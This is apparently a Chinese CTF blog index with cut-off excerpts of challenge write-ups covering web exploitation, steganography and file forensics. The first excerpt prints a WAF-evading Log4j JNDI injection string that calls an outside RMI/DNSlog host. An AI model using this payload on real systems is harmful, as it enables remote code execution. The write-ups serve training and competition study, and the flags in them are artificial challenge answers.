Keepb1ue的博客

文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_dogeWebshiro?很明显不是一般的shiro，很多命令都不能用，又是Sprintboot框架，那可以尝试log4j RCE发现存在WAF检测，bypass测试绕过：${${::-j}ndi:rmi://r5qm53.dnslog.cn/

目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality menWEB简单的Web<?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p

下载附件，是一张图片:感觉图片宽高差距有点大，而且有提示查看下宽高尝试将高改高一点，算一下高度256(0x100),通过十六进制查看器修改下高度：将100改成2 A7，改和宽度一样保存，查看图片：得到flag:flag{He1|0_d4_ba1}...

打开附件看下:KEY.exe010 Edirtor查看:提示很明显是base64编码的PNG，解码的二进制写入到图片中即可：小脚本解码后写入:import base64with open('KEY.exe','r') as f: content=f.read() content=content.split(',',1) content=base64.b64decode(content[1])with open('img.png','wb') as f: f.write(conte.

题目复现地址：https://buuoj.cn/challenges#[INSHack2018](not)%20so%20deep题解：下载得到一个wav后缀的文件，通过音频分析软件查看频谱图：如果看不到上面频谱图效果，可以尝试把最高频率调高。由上可以看到flag，但好像只有一半。后面则需要用到一个新的工具，DeepSound：链接：https://pan.baidu.com/s/1wsY5d2fp6cQJiDyUj2KWZA 提取码：dqlu这是老外做的一款文件隐藏工具，可以在歌曲中隐藏文

题目复现地址：https://buuoj.cn/challenges#[INSHack2019]gflag题解：将附件下载下来，得到一个gflag文件，查看内容：也不清楚该内容是什么，通过资料查阅了解，这是3D打印gcode的命令：https://blog.youkuaiyun.com/redsleep/article/details/80885224于是将后缀改为.gcode在线预览gcode网址：http://gcode.ws/将gcode文件加载到网址中去这里还是看不清flag选择2D渲染选项，将

题目地址：https://buuoj.cn/challenges#%E4%BA%8C%E7%BB%B4%E7%A0%81图片分析下载下来一个压缩包，压缩包里只有一张二维码试着扫描：secret is here，很明显flag就在这个压缩包里(不然在哪里…)hexdump查看分析很明显，二维码中还隐藏着一个压缩包。里面好像存放着一个4number.txt使用binwalk分析文件分离：确实隐藏了一个zip文件。可以用-e选项自动分离，也可以用dd命令分离隐藏文件压缩包破解：尝